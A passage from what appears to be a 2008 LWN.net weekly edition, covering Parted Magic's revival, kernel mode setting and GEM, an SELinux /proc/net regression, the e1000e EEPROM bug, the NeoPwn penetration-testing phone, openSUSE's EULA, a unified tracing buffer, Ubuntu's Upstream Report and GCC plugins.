keep linux.conf.au vital and interesting for many years; it makes sense to
do something similar with the Linux Plumbers Conference.  Now might be a
good time for any North American community which would like to host this
event in 2010 to start thinking about how it could be done.

		The Optimistic Contributor Returns - Parted Magic Part 2


About eleven months ago, I wrote an article for
LWN about the Parted Magic Linux Live CD distribution, a distribution
with the elemental purpose of partitioning hard drives.  At that time, the
primary developer, Patrick Verner, had announced his intention to stop work
on the distribution due to lack of support from the community. I lamented
the fate of the project and wondered how many other promising projects had
died under similar circumstances.  I vowed to try and do better to support
open software myself and called upon the community at large to do the same.
Fast forward to today, and your Optimistic Contributor feels vindicated in
his self-appointed choice of title. 

Why, you may ask? Well, to put it simply, the project did not die.
To find out what happened, I spoke again with Verner on September 14th,
2008.

OC - When we last spoke in October of 2007, you had posted on your
website that development of Parted Magic would cease after version 1.9
was released. Since that time, you have released many more versions up
to 3.0 (with 3.1 on deck). What motivated you to continue the project?


PV - There were very little donations, help with code, or users giving me
at least a pat on the back. Between 1.8 and 1.9 was by far the lowest
point in this project. To this day I still think your article saved the
project, well, sort of. After your LWN article I received the best month
of donations and offers for help. The worse mistake I made was not asking
for help in the first place. Once I started asking for help and starting
directly asking for small donations the project turned around at a rapid
pace. The best advice I could give anybody working on OSS projects is
to ask. People assume you like doing it for free and don't need any help.
The project makes about $400 a month now and it's nice because I can
take the family out bowling a few times a week, buy some new computer
hardware, or buy something for the house.


OC - Since development has continued, the distro seems to have evolved
at a steady pace. What features would you like to highlight, or
rather, what feature(s) are you most proud of?


PV - The best thing about Parted Magic is the fact it's not based on another
distribution. Parted Magic is it's own entity and has the flexibility to
go where ever it needs to go and add whatever may be required to perform
needed tasks. There really isn't any comparison between Parted Magic
and any other distro. It's really off the wall compared to the rest.
Original thinking and process is what makes Parted Magic different and it's
what I'm most proud of.


OC - You have started what appears to be a project within a project with
MiniPM (aka Beef Drapes). What itch were you trying to scratch with
this new project?


PV - MiniPM is a small project designed to run partimage over

PXE. It really
wasn't too hard to create and won't be heavily maintained. It fills a
small niche and so far it seems to do what it's supposed to and nothing
more. It's not much of a diversion. http://partedmagic.com/beef_drapes
is my test directory. It's not a separate project or fork.


OC - What do you believe will drive you to continue development on both
projects for the foreseeable future?


PV - When this project is no longer useful or donations starting declining
back to 1.8 levels I'm out. I don't want to do this for free. It's fun to
work on and I really enjoy it, but how can I justify the hours spent to my
wife if I'm getting nothing tangible in return? It was always a goal of
mine to do this for a living and I'm still hopeful it could happen. All it
would take is $2 from every person that finds this project useful. I work
50+ hours a week at my day job so things happen pretty slow here. I
couldn't even imagine how fast things would happen and the quality this
project could provide if I just had more time.


OC - If you could give advice to any open source programmer on how to
keep a project going, what would you say?


PV - Enjoy what you are doing, grow a thick skin, and find motivation to do
it.


OC - How has your opinion open source community changed in the last 10
months?


PV - Not at all. I failed to ask, that was my problem. If you want anything
from the open source community you need to ask and give back what was given
to you.


OC -  Is there anything you would like to add?


PV - Sure. Use http://partedmagic.com/beef_drapes
and tell me what needs to be fixed before the next release. This is a big
benefit to all Parted Magic users.


Now, your Optimistic Contributor would like to take credit for helping to
save the project, but all I did was inform the community of the
situation. It was the community itself that did the actual saving. The
donations, the offers of help, just the notes of thanks were enough to keep
Verner going. Verner's response to one of my questions really resonated:
"If you want anything from the open source community you need to ask
and give back what was given to you."

I read that statement several times. After letting it sink in, I realized
how effectively Verner got straight to the point. In my previous article I
made the common statement that freedom isn't free. Verner has taken that
one step further in saying that a community isn't a community without
communication and give and take. That sounds obvious after the fact, but I
am glad Verner put the idea so clearly in my head. I can only hope (as I am
ever the Optimist) that others within the open source community receive the
same level of clarity as I have.

So what about version 3.0 itself? Just like the motivation of the project
maintainer, the project itself has undergone a bit of a revolution. Almost
the entire underpinnings have been updated or redesigned. The user
interface still looks very similar to what 1.9 was, but everything just
seems smoother and more polished than before. It is actually hard to
believe that the project is put together by a handful of individuals. The
best way to experience what the distribution is capable of (besides reading
my original article) is to take Verner's last answer to heart:
"Use http://partedmagic.com/beef_drapes
and tell me what needs to be fixed before the next release.  This is a big
benefit to all Parted Magic users."

		LPC: The future of Linux graphics


On the final day of the Linux Plumbers Conference, Keith Packard ran a
microconference dedicated to future displays.  A number of topics were
discussed there, but the key session had to do with the near-term future of
Linux video drivers.  Longtime LWN readers will be more than familiar with
the story: Linux has multiple subsystems charged with managing graphics
hardware, the user-space driver model adopted by XFree86 leads to all kinds
of problems, support for 3D graphics is not what it should be, etc.  That
whole story was recounted here, but with a notable difference: solutions
are in the final stabilization stages, and these problems will soon be
history.


There are two major components to the work which is being done: graphics
memory management and kernel-based mode setting.  A contemporary graphics
processor (GPU) is really a CPU in all respects, including the possession
of a sophisticated memory management unit.  Managing the sharing of memory
between user space, the kernel, and the GPU is fundamental to the
implementation of correct, high-performance graphics.  One year ago, the TTM subsystem looked like the
solution to the memory management problem, but TTM grew increasingly
unworkable as the understanding of the problem improved.  So now the Graphics Execution Manager (GEM)
code looks like the way forward; it is currently being prepared for merging
into the mainline kernel.


Kernel-based mode setting, instead, is meant to get user-space code out of
the business of messing around directly with the hardware.  Putting the
kernel in charge of the configuration of the video adapter has a long list
of advantages.  Suspend and resume have a much better chance of working,
for example.  Once the X server stops accessing hardware directly, it no
longer needs to run as root; having that much untrusted code running with
full privileges has made people nervous for many years.  In the current
scheme, the kernel cannot change the graphics mode if it needs to; that
means that, for example, if the system panics, a graphical user will never
see the message.  With kernel-based mode setting, the kernel can switch to
a different mode and allow the user to frantically try to read the message
before it scrolls off the screen.  Kernel-based mode setting will also make
fast user switching work much better, without the need to use a separate
virtual terminal for each user session.


One of the first topics of discussion was: how does the kernel decide when
to switch to the panic screen to show the user an important message?  There
are quite a few different paths by which the kernel can indicate distress;
should a kernel message be presented every time a WARN_ON()
condition is encountered?  There would appear to be a need to unify the
error paths in the kernel to help simplify this kind of decision.  Linus
Torvalds Jesse Barnes suggested that the kernel could simply switch on every message
emitted with printk(), on the theory that such a policy would lead
to a rapid and welcome reduction in kernel verbosity.


The real debate in this session, though, had to do with development
process.  As has been discussed
previously on LWN, much of the video driver work is done outside of the
mainline kernel tree.  We are now seeing a big chunk of that work being
prepared for a merge.  But the new mode setting interface is a big API
change which will require adjustments from user space; a new kernel
expecting to handle mode setting may not give the best results when run
with an older user space X server.  So there will be a big flag day of
sorts when everything changes and all of the new code gets run for the
first time.


Linus is not pleased with the notion of a video graphics flag day; he made
a long appeal for a more incremental approach to fixing the video driver
work.  In his opinion, the flag day will lead to a whole bunch of untested
code being made active all at once; there will certainly be design mistakes
which show up, and the whole thing will fail to work properly.  At which
point another flag day will be required.  Linus was not impressed by the
claim that Fedora users have selflessly been testing this code for
everybody; in his view, the kernel developers are not doing this testing.
He sees the whole thing as a recipe for disaster.


The real problem - and the reason for the out-of-tree development - is that
all of this work requires the creation of a number of new, complex
user-space ABIs.  That is true for both mode setting and memory management,
and the two cannot be easily separated from each other.  Until the
combination as a whole is seen to work, the video driver developers simply
cannot commit themselves to a stable user-space interface - and that means
that their code cannot be merged.


As an example, TTM was cited.  Had that code been pushed when it looked
like the right solution, there would now be even bigger problems to solve.


In summary, the graphics developers believe that the approach they are
taking is as incremental as they can make it.  Whether they convinced Linus
of that fact is unclear, but he eventually seemed to accept the plan.  He
did ask for them to push the mode setting code upstream first, but that
code cannot work without memory management support.  So GEM will go into
the mainline ahead of kernel-based mode setting.  Once everything is in the
kernel, it will be possible to boot a system with either kernel-based or
user-space mode setting, so both new and old distributions will be
supported.  Someday, in the distant future, support for mode setting in
user space can be removed.  Much sooner than that, though, we should all be
running much-improved graphics code and will have long since forgotten how
things used to be.

		Newer kernels and older SELinux policies


A subtle change in 2.6.25 recently left Andrew Morton with a less than
completely functioning system, but it also demonstrated a user-space
interface that may sometimes be overlooked: SELinux.  The problem stemmed
from a change to facilitate containers by making /proc/net into a
symbolic link, which tripped up SELinux policies that had been
written for earlier kernels.  Putting policy into user space is a guiding
principle of kernel development, but that can sometimes lead to an unexpected
synchronization required between those policies and the kernel.  


The change itself was fairly minor, making /proc/net be a symbolic
link to /proc/self/net so that containers would only see their
network devices, rather than those of the enclosing system.  But when
Morton ran a recent kernel on his Fedora Core 5 and 6 systems, he got:

Further investigation found that even ls got permission errors
when looking at /proc/net.  As is usual with mysterious
"permission denied" errors, SELinux was the underlying cause.


When the change was made, back in March, it was reviewed by the SELinux
developers, but no one noticed that it would cause an additional permission
check—on the symbolic link itself.  So, when resolving things like
/proc/net/dev or other entries in that directory, the "labels" on
the symbolic link were checked.  Of course, /proc is a synthetic
filesystem, so the labels are generated from SELinux code rather than
retrieved from extended attributes (xattrs).


Distributions have updated their policies to allow access to the symbolic
link—probably by noticing the SELinux denial in log messages—so
most folks 
never saw the problem.  As Morton found out, though, existing distribution
policy files 
(those shipped with FC5 and FC6 for
example) would still disallow the access.  Morton regularly runs newer
kernels with older distributions to try to catch exactly this kind of
error; he is probably one of very few, perhaps the only one, doing that.


Because the distribution-supplied kernel was being changed, some argued
that requiring users to update their SELinux policies is not an onerous
requirement. 
  Paul Moore puts it this
way: 

 Maybe 
I'm in the minority here, but in my mind once you step away from the 
distro supplied kernel (also applies to other packages, although those 
are arguably less critical) you should also bear the responsibility to 
make sure you upgrade/tweak/install whatever other bits need to be 
fixed.


Morton did not buy that argument saying:

Nope.  Releasing a non-backward-compatible kernel.org kernel is a big
deal.

We'll do it sometimes, with long notice, much care and much deliberation.

We did it this time by sheer accident.  That's known in the trade as a
"bug".


But SELinux developer Stephen Smalley points out that permissions checks
are not normally considered part of the kernel to user space interface.  It
is something of a gray area, though.  Clearly the standard UNIX permission
checks are part of that interface, at least partially because the
kernel does handle the policy for those checks.  Since the policies that
govern the decisions about SELinux
access denial come from user space, it is a bit hard to argue that
changes to the kernel will not ripple out.  Smalley describes the problem:

I should note here that for changes to SELinux, we have gone out of our
way to avoid such breakage to date through the introduction of
compatibility switches, policy flags to enable any new checks, etc
(albeit at a cost in complexity and ever creeping compatibility code).
But changes to the rest of the kernel can just as easily alter the set
of permission checks that get applied on a given operation, and I don't
think we are always going to be able to guarantee that new kernel + old
policy will Just Work. 


One possible solution to the immediate problem was floated by Smalley:
SELinux could change the 
label that it returns for symbolic links under /proc.  It is not
clear that anyone really wants that change, and there has been no movement
to add it.   As Morton says, "people who are shipping 2.6.25-
and 2.6.26-based distros probably 
wouldn't want such a patch in their kernels anyway." 


Longer term, Eric Biederman asks about
supporting xattrs for /proc.  That would allow user space to label
the proc filesystem appropriately, removing one of the special cases.
Unfortunately, doing so would create yet another incompatibility between
newer kernels and older user spaces.  


In the end, because the bug was only seen
by Morton, many months after it was introduced, it may just be ignored.
The larger issue of how permissions checks fit into the kernel to user
space interface, though, may rear its head again.


		e1000e and the joy of development kernels


The 2.6.27-rc regression list
posted on September 21 contains - deep within the list - an entry
reading "e1000e: 2.6.27-rc1 corrupts EEPROM/NVM".   One might be forgiven
for missing it; the list of regressions is still (unfortunately) long, and
there is nothing there to indicate that it is a notable problem.  But it
is: this particular bug goes beyond breaking networking; when it bites, it
corrupts the EEPROM on the device, causing it to cease to function
forevermore (or, at least, until the user can manage to flash the EEPROM
with working code).  This is a problem which is worth fixing.


As of this writing, though, nobody seems to know what the problem is.
There was some confusion resulting from the fact that the related e1000
driver also suffered from an EEPROM corruption problem - but that turns out
to have been an entirely different bug.  The e1000 problem was fixed by
putting a lock around accesses to the EEPROM, preventing corruption caused
by concurrent access.  But something else is going on with the e1000e.


Figuring out what that "something else" is appears to be a challenge.  The
problem is not readily reproducible, and there is this little problem that
triggering the bug more than once requires the replacement of the affected
hardware.  It's not even clear which kernel versions are affected, though
it appears that only the 2.6.27 development series shows the bug.  There is
some correlation between e1000e corruptions and graphics driver crashes,
leading David
Miller to pursue a hypothesis that the
real culprit is changes to the X server, but that idea has not, yet been
proven.  Other developers suspect a concurrency-related problem similar to
the e1000 bug.


As of this writing, the bulk of what is known can be found in this
advisory from Mandriva.  Kernel developers are adding information to the kernel bugzilla
entry as they find it.


It has been suggested that anybody running 2.6.27 on a potentially affected
system might want to save a copy of the current EEPROM contents with a
command like:


(That assumes, of course, that the relevant device is eth0 on your
system).  With the saved data, it should be possible to recover the device
if the worst happens; without, chances are that victims will have to return
their systems to the vendor.


In one sense, this bug demonstrates that the system works.  It was caught
while the kernel was still in the stabilization phase; one can be certain
that it will be obliterated somehow before any stable 2.6.27 release comes
out.  On the other hand, the first report
of this problem hit the net on August 8; the problem was known for
over a month before distributors started responding to it and the all-out
hunt for the cause began.  That is a long time for any regression to
persist, but it is especially long when one is dealing with a regression
which has the ability to regress hardware back to a stone-age state.

The distributors have now responded; most of them have withdrawn kernels
with the affected drivers.  So far, nobody has posted tools to help
affected users recover their hardware (suggestions to use ibautil
should be ignored and forgotten about as soon as possible).  Such a tool
is forthcoming, but it would be hard to
blame the relevant 
engineers for focusing on fixing the problem first.  With any luck at all,
the root cause will have been isolated by the time you read this.

There is one thing that will not have changed, though.  Testers of
unstable software - especially the kernel - have often been warned that
said software can do all kinds of terrible things to their systems.  It is
easy to ignore those warnings; even -rc1 kernels actually work for most
people, most of the time.  But, as we have seen in this case, the
potential for catastrophic bugs is real.  Development code can brick your
network adapter, scramble your filesystems, open up severe security holes,
or save your documents as OOXML.  When experimenting with unstable code -
even if it has been neatly packaged by your distributor - it is always
prudent to have good backups and an even better sense of humor.

		Mobile phone or penetration tool?


The NeoPwn is 
a pocket-sized network penetration tool based on Linux and free software.
The form factor should be familiar to anyone that has paid attention to
the Linux mobile phone market as NeoPwn is based on the OpenMoko Neo 
FreeRunner.  When the device starts shipping, users will be able to do
network monitoring and penetration testing from an unobtrusive
platform—then call home with it.


NeoPwn comes with an impressive array of free software security
tools, including things like Metasploit, Aircrack-ng, WifiZoo, Wireshark, and many others.  They all
run on top of a customized Linux 2.6.24 kernel—sources to be released
when the hardware ships, which is scheduled for October 1—from the
microSD flash module.   A full Debian distribution is included on a flash
filesystem that has been
optimized for performance and size.


The company behind NeoPwn has also created a GUI interface to the system for
hardware control as well as attack automation.  The interface is meant to
reduce the need for using the command line for the most common types of attacks.
Using the tools, Wired Equivalent Privacy (WEP) keys can be cracked in 5 to
14 minutes depending on whether the network has clients connected or not.
The NeoPwn is not set up to crack Wifi Protected Access (WPA) keys on the
device itself, but it can capture the handshake for use by programs on more
powerful systems.


There are several different options for purchasing the
NeoPwn—all of them 
rather pricey.  The basic model is $699 for the phone (normally $399),
software, and some useful accessories.  One can also just purchase the
software on a 2GB microSD card for $79.  The website has a prominent
warning that might deter some, however: "Please be advised that if
you do not 
choose a complete system, you will have to program the phone's bootloader
manually for the correct microSD bootloader entry, to the NAND memory. This
can be dangerous if you do not know what you are doing!" 


The standard FreeRunner Wifi has firmware limitations that will not allow
monitoring or packet injection—pretty important capabilities for a
network security tool—so various USB Wifi cards come with the NeoPwn.
Also, since a custom kernel is used, one cannot make phone calls and do
penetration testing at the same time.  At boot time, one must choose
between the two modes.  Even with those limitations, the FreeRunner seems
like an excellent choice as a platform. 


For those puzzled by the name, "pwn" is used for the word "own" in the "leetspeak" used by many
in the security community—both white and black hat.  Breaking into
and controlling a network or system is then "pwning" it.  NeoPwn is not
alone in using the term.  Metasploit
author H D Moore's iPwn Mobile
makes UMPC-based penetration testing devices.


Both the NeoPwn and iPwn Mobile's Infiltrator look like useful
devices for those needing an off-the-shelf solution, but because they are
based on free
software, the core capabilities are available to those with a lower budget.
By showing what can be done with open mobile phones like the FreeRunner,
NeoPwn is doing a great service for both OpenMoko and the free software
community.  Undoubtedly various malicious folks will get their hands on
devices like this, so it is important that security researchers and
professionals have access to them as well.


		openSUSE and the distribution of proprietary software


Every Linux distributor must find its own peace when it comes to the issue
of proprietary software.  Some distributors will avoid anything non-free to
the point of tearing firmware out of the kernel.  Others, like Fedora or
Debian, will not 
include any non-free code.  Distributors like Ubuntu are rather more
willing to facilitate the use of non-free software, but even they are, perhaps,
not 100% comfortable with it.  And distributions like Xandros positively
embrace proprietary code.


OpenSUSE (like SuSE Linux before it) has traditionally taken a position
which is relatively friendly 
toward proprietary software.  It was only in 2006 that Novell announced its intention to stop
shipping non-GPL kernel modules, but it never made any such promises with
regard to user space.  So a typical openSUSE installation disk includes a
number of proprietary goodies, including the Adobe Flash player, a number
of fonts, ARCAD, the Acrobat PDF reader, the Opera web browser, RealPlayer,
and more.  


The presence of all this proprietary code is unwelcome to some users, of
course, but it has another interesting effect: it requires that openSUSE be
distributed with an end-user license
agreement which has some very un-free-software-like terms.  Among other
things, it reads:


	Novell reserves all rights not expressly granted to You. You may
	not: (1) reverse engineer, decompile, or disassemble the Software
	except and only to the extent it is expressly permitted by
	applicable law or the license terms accompanying a component of the
	Software; or (2) transfer the Software or Your license rights under
	this Agreement, in whole or in part.


In other words, redistribution of the openSUSE DVD is not permitted.
Members of the openSUSE mirror network are, technically, in violation of
the EULA, though nobody appears to be in a hurry to call them on that.
But the EULA raises eyebrows and makes some users uncomfortable; many
people got into free software to avoid dealing with agreements like that. 


The need for the EULA, rather than problems with proprietary software in
general, is causing developers at Novell to reconsider which packages
should go onto an openSUSE DVD.  To that end, Novell product manager
Michael Löffler has proposed a new
scheme whereby the DVD would only contain redistributable software
(including proprietary software, such as firmware, which allows
redistribution).  The openSUSE project would set up a network-based
repository from which other proprietary applications could be installed;
the installer would then install a couple of packages (the Adobe Flash
player and Fluendo's MP3 codec) by default.


The end result for most users would be the same: an openSUSE installation
with both free and proprietary software.  At least, that would be the case
for users with a decent network connection.  But those users would also
gain a DVD with a much less restrictive EULA allowing the DVD to be
redistributed at will.  (The current plan is to still have an agreement for
trademark control and warranty disclaimer reasons, even though other
software distributors have managed to eliminate EULAs for those purposes). 
At this point, it would also be easy to add an
option to simply skip the configuration of the non-free repository for
users who want a "clean" installation.

Most responses to this proposal have been positive.  The happiness is not
universal, though; one user complained:


	I don't think Novell, openSUSE and us should be influenced by "bad
	press" of doubt quality and change what is a key point of openSUSE:
	offering also proprietary software ready to go on the DVD.  Moving
	these packages to an online repository makes no difference from
	downloading and installing them by hand.


It is true that one-stop shopping has long been a feature of the SUSE
distribution.  And a
recent survey [PDF] suggests that a significant portion of the openSUSE
user base makes use of at least a few of the proprietary tools included
there.  If the presence of this code is truly a "key point" of openSUSE,
then taking it out could risk upsetting users at a time when, by some
accounts, the visibility of this distribution is already dropping. 

This risk would be mitigated by a couple of factors, though.  One is that
the need to download those packages over the net is not much of a stopping
point for most users.  After all, people installing Linux from a CD or DVD
have usually resigned themselves to a massive download of package updates
after the first boot anyway.  Tossing a few more packages into that
download - assuming they weren't set to be updated by then anyway - is not
going to change the experience in any significant way.

But the other relevant point is that the need for much of this proprietary
code is decreasing.  Java used to be a big part of the openSUSE
proprietary software load, but Java is now free.  Your editor cannot
remember when he last encountered a PDF file which could not be managed by
at least one free viewer - though, evidently, such files do still
exist.  Perhaps the biggest remaining problem is Flash; progress is being
made there, but Flash is most certainly not a solved problem.  Beyond that,
though, there are few situations indeed where a proprietary application is
really needed for ordinary tasks.

The openSUSE distribution is not distancing itself from proprietary
software at this time; it is just reorganizing its management of that
software to address one of the problems it brings.  But it is still hard to
avoid the temptation to read between lines and look forward to a day when
openSUSE, too, distributes only free software - not as a result of any sort
of push for purity, but just because its users no longer have any need for
anything else.

		Low-level tracing plumbing


Kernel and user-space tracing were heavily discussed at both the kernel
summit and the Linux Plumbers Conference.  Attendees did not emerge from
those discussions with any sort of comprehensive vision of how the tracing
problem will be solved; there is not, yet, a consensus on that point.  But
one clear message did come out: we may end up with several different
tracing mechanisms in the kernel, but there is no patience for redundant
low-level tracing buffer implementations.  All of the potential tracing
frameworks are going to have to find a way to live with a single mechanism
for collecting trace data and getting it to user space.


This conclusion may look like a way of diverting attention from the
intractable problems at the higher levels and, instead, focusing everybody
on something so low-level that the real issues disappear.  There may be
some truth to that.  It is also true, though, that there is no call for
duplicating the same sort of machinery across several different tracing
frameworks; coming up with a common solution to this part of the problem
can only lead to a better kernel
in the long run.  But there is another objective here which is just as
important: having all the tracing frameworks using a single buffer allows
them to be used together.  It is not hard to imagine a future tracing tool
integrating information gathered with simultaneous use of ftrace, LTTng,
SystemTap, and other tracing tools that have not been written yet.  Having
all of those tools using the same low-level plumbing should make that
integration easier.


With that in mind, Steven Rostedt set out to create a new, unified tracing
buffer; as of this writing, that patch was already up to its tenth iteration.  A casual perusal of the
patch might well leave a reader confused; 2000 lines of relatively complex
code to implement what is, in the end, just a circular buffer.
This circular buffer is not even
suitable for use by tracing frameworks yet;  a separate "tracing" layer is to
be added for that.  The key point here is that, with tracing code,
efficiency is crucially important.  One of the main use cases for tracing
is to debug performance problems in highly stressed production
environments.  A heavyweight tracing mechanism will create an observer
effect which can obscure the situation which called for tracing in the
first place, disrupt the production use of the system, or both.  To be
accepted, a tracing framework must have the smallest possible impact on the
system.


So the unified trace buffer patch applies just about every known trick to
limit its runtime cost.  The circular buffer is actually a set of per-CPU
buffers, each of which allows lockless addition and consumption of events.
The event format is highly compact, and
every effort is made to avoid copying it, ever.  Rather than maintain a
separate structure to track the contents of an individual page in the
buffer, the patch employs yet another overloaded variant of struct
page in the system memory map.  (Your editor would not want to be the
next luckless developer who has to modify struct page and, in the
process, track down and fix all of the tricky
not-really-struct-page uses throughout the kernel).  And so on.

The patch itself does a fairly good job of describing the trace buffer API;
that discussion will not be repeated here.  It is worth taking a quick look
at the low-level event format, though:


This format was driven by the desire to keep the per-event overhead as
small as possible, so there is a single 32-bit word of header information.
Here, type is the type of the event, len is its length
(except when it's not, see below), time_delta is a time
offset value, and array contains the actual event data.

There are four types of events; one of them (RINGBUF_TYPE_PADDING)
is just a way of filling out empty space at the end of a page.  Normal
events generated by the tracing system (RINGBUF_TYPE_DATA) have a
length given by the len field, which is right-shifted by two
bits.  So the maximum event length is 28 bytes (32 bytes minus four for the
header word), which is not very long.  For longer events, len is
set to zero and the first word of the array field contains the
real length.

The other two event types have to do with time stamps.  Over the course of
the discussion, it became clear that high-resolution timing information  is
needed with all events, for two reasons.  The recording of events into
per-CPU arrays, while essential for performance, does have the effect of
separating events which are related in time; the addition of precise
timekeeping will allow events to be collated in the proper order.  That
collation could be handled through some sort of serial counter, but some
performance issues can only be understood by looking closely at the precise
timing of specific events.  So events need to have real time data, at the highest
resolution which is practical.

Just how that data will be recorded is still unclear, and may end up being
architecture dependent.  Some systems may use timestamp counter data
directly, while others may be able to provide real times in nanoseconds.
Whatever format turns out to be used, there is no doubt that it will
require 64 bits of storage.  But most of the time data is redundant between
any two events, so there is no real desire to add a full 64-bit time stamp
to every event in the stream.  The compromise which was reached was to
store the amount of time which passes between one event and the next in the
27 bits allotted.  Should the time delta be too large to fit in that space,
the trace buffer code will insert an artificial event (of type
RINGBUF_TYPE_TIME_EXTENT) to provide the necessary storage space. 

The final event type (RINGBUF_TYPE_TIME_STAMP) "will hold data to
help keep the buffer timestamps in sync."  This little bit of functionality
has not yet been implemented, though.

The rate of change of the trace buffer code appears to be slowing somewhat
as comments from various directions are addressed; it may be getting close
to its final form.  Then it will be a matter of implementing the
higher-level protocols on top of it.  In the mean time, though, the
attentive reader may be wondering: what about relayfs?  The relay code has
been in the kernel for years, and it was intended to solve just this kind
of problem.

The most direct (if not most politic) answer to that question was probably posted by
Peter Zijlstra:


	Dude, relayfs is such a bad performing mess that extending it seems
	like a bad idea. Better to write something new and delete
	everything relayfs related.


Deleting relayfs would not be that hard; there are only a couple of users,
currently.  But relayfs developer Tom Zanussi is not convinced that the problems with
relayfs are severe enough to justify tossing it out and starting over.  He
has posted a series of patches cleaning up
the relayfs API and addressing some of its performance problems.  At this
point, though, it is not clear that anybody is really looking at that work;
it has not received much in the way of comments.

One way or the other, the kernel seems set to have a low-level trace buffer
implementation in place soon.  That just leaves a few other little problems
to solve, including making dynamic tracing work, instrumenting the kernel
with static trace points, implementing user-space tracing, etc.  Working
those issues out is likely to take a while, and it is likely to result in a
few different tracing solutions aimed at different needs.  But we'll have
the low-level plumbing, and that's a start.

		Ubuntu debuts its Upstream Report


Ubuntu has taken some heat over the years for its relationship with
upstream projects, but the distribution seems determined to change that
impression.  To that end, Ubuntu has started by
looking at bugs and bug reporting between the distribution and upstream
projects.  The visible result is the beta release of the Ubuntu Upstream
Report, which displays the progress of getting bugs upstream.


Users of Ubuntu report lots of bugs in the software they use but, for the
most part, those bugs aren't in any way specific to Ubuntu; they tend to
also exist in the upstream project.  Ubuntu collects its bugs at Canonical's Launchpad web site which allows linking
those bugs to bugs in the bug tracking system of an upstream project.  Once
the link—or watch as it is called in Launchpad—is
established, updates to the upstream bug's status will be reflected in the
Ubuntu bug as well.


That capability has been available for some time, but as Ubuntu looked at
ways to improve how well their bugs were flowing upstream, they needed a
way to measure how well watches were being used.  Canonical's Ubuntu
community manager Jono 
Bacon describes the idea behind
the report:


In terms of this project, I was keen to see graphs that show the number of
upstream bug linkages going on, the total number of open vs. upstream bugs
and how many bugs are fixed elsewhere. We could use these graphs to
determine our progress in improving our bug workflow, but this was not
enough - we also needed raw data about which projects needed the most
focus. Which projects were struggling the most with bug figures? Which
projects were not forwarding bugs upstream? Which projects didn't have an
upstream bug tracker registered in Launchpad? We had all the answers to
these questions in Launchpad, but no means of gathering them. To fix this,
we created the Ubuntu Upstream Report. 


The report ranks Ubuntu projects by the number of open bugs, while also
showing how many have progressed towards upstream.  Bugs in Ubuntu get
triaged by the Ubuntu bug team, with some of them getting classified as
"upstream"—meaning that they exist in the project itself, rather than
just Ubuntu's build.  Upstream bugs that are linked to a bug in the
projects bug tracker are considered "watch" bugs.  Each successive stage
shows the difference between the previous, both as a number and a
percentage so that it is easy to see how bugs are being handled as well as
where the bottlenecks are.  This dashboard-style interface also allows
sorting by column and retrieving lists of bugs by following the numeric
links. 


The report was created by Jorge Castro, who is in charge of external project
developer relations for 
Canonical.  The tool has multiple uses, as Castro explains:


We wanted to provide a tool that not only shows upstreams how well we're
linking and forwarding bugs, but a day-to-day tool for maintainers to see
where there are targets of opportunity to forward to upstream. And lastly,
for triagers we wanted to provide real-time working "bug lists" that you
can work through if you want to help be the bridge that connects the
downstream Ubuntu Package to the upstream project. 


Part of the idea is for the report to be used by participants in Ubuntu's
5-A-Day initiative.  5-A-Day
is an effort to make the Ubuntu bug list better by encouraging users and
developers to work on five bugs each day.  Users can do things like try to
reproduce the bug, cleaning up and adding more information to the report;
while developers can triage bugs or look at patches to the upstream project
to see if they are needed for Ubuntu.  The report will also help those
who are running or participating in Bug Jams—focused
efforts to gather people together to move Ubuntu bugs along.


Linking to existing upstream bugs or creating new ones for problems that
Ubuntu users find can be helpful for projects.  Some projects will find it
more helpful than others, as Bacon notes:

If we do link a bug upstream, we had no firm idea how useful an upstream
actually find our bug data. Our discussions suggested very mixed reactions
- a small project is likely to have a very different perspective on bugs
than a large project. Just think about this in purely quantitative states -
a small project will likely get fewer bugs, and these bugs can probably be
dealt with by a small collection of volunteers. This is unlikely to scale
to something like the Linux kernel or OpenOffice.org.


One of the problems, of course, is the one-way nature of the watch
link—Ubuntu sees changes to the upstream bug, but the reverse is not
true—as projects have to come looking in Launchpad for updates.
There is also resistance to using Launchpad because it is not free software,
though that is slated
to change by mid-2009.  Overall, this new report and the focus on
improving upstream relations are very welcome, but tracking bugs only goes so
far; fixing upstream bugs is an important, but missing, piece.


In order to not be seen as just a consumer of upstream software, one needs
to not only report bugs, but fix them as well.  For all of the various
bug-related efforts that Ubuntu is sponsoring, there is very little mention
of actually fixing problems and sending patches upstream.  There are tools
like Harvest that make it
easier to find upstream patches—bug fixes and enhancements for
possible inclusion in the Ubuntu packages—but
the focus is clearly on improving Ubuntu, as opposed to improving the
software ecosystem that makes up the distribution.


It is important to remember that
the efforts so far are just a start; Ubuntu is working on additional
projects to improve its upstream relations.  One gets the sense that they
have heard the criticisms and are working to address them.  Like it
or no, Ubuntu has its own way of doing things which may mean it takes
longer than some would like, but it certainly looks to be headed in the
right direction.


		Plugging into GCC


Almost one year ago, LWN examined
the GCC plugin mechanism - or, more exactly, the lack of such a
mechanism.  Despite the increasing level of interest in adding
special-purpose modules to the GCC compiler, GCC has no API which allows
this addition to be done.  So developers working on GCC extensions are
faced with the daunting prospect of patching their code directly into the
compiler.  This situation looked unlikely to change; the Free Software
Foundation's fears that a plugin mechanism would be used by proprietary
extensions was just too strong.  One year later, though, things look a
little different; there may be a plugin-capable GCC available in the
(relatively) near future.

There are a lot of good reasons for wanting to add plugins to the GCC
compiler.  The implementation of better optimization techniques is an
obvious example, but there is more than that.  The EDoc++ project has put together a
static analysis tool which performs checking of exception handling in C++
code - and generates documentation while it's at it.  Mozilla uses its Dehydra tool to find
potential problems in the browser's code base.  The LLVM compiler can be thought of as a sort of
GCC plugin, currently.  The Middle End Lisp
Translator project is working on a Lisp-like language which, in turn,
can be used within plugins for static analysis and code transformations.
The list goes on; just about any project working on
the processing of programs can benefit from hooking into the GCC platform.

The concern that has long been expressed by the FSF (which owns the
copyrights on GCC) is that a general plugin mechanism would make it
possible for companies to traffic in binary-only GCC modules.  Rather than
contribute a new analysis or optimization tool - or a new language - to the
community, companies might have an incentive to distribute their work
separately under a restrictive license.  That runs very much counter to
what the FSF is trying to accomplish, so opposition from that direction is
not particularly surprising.

But the pressure for some sort of plugin API is not going away, so the GCC
developers have been thinking about ways to make it possible without
upsetting Richard Stallman.  One alternative which has been discussed is to
require plugins to be written in a high-level scripting language - Python
or Perl, perhaps.  Then plugins would, for all practical purposes, have to
be distributed in source form.  Even if they carried a hostile license, it
would be possible to study them and learn how they actually work.

Another possibility is to take a page from the Linux kernel's book and keep
the plugin API unstable.  If the API changed with every GCC release, GCC
would become a moving target which would be much harder for proprietary
vendors to keep up with.  An unstable API may be the way things go in any
case - there may be no other way to allow GCC itself to continue to
progress quickly - but experience with the kernel shows that an unstable
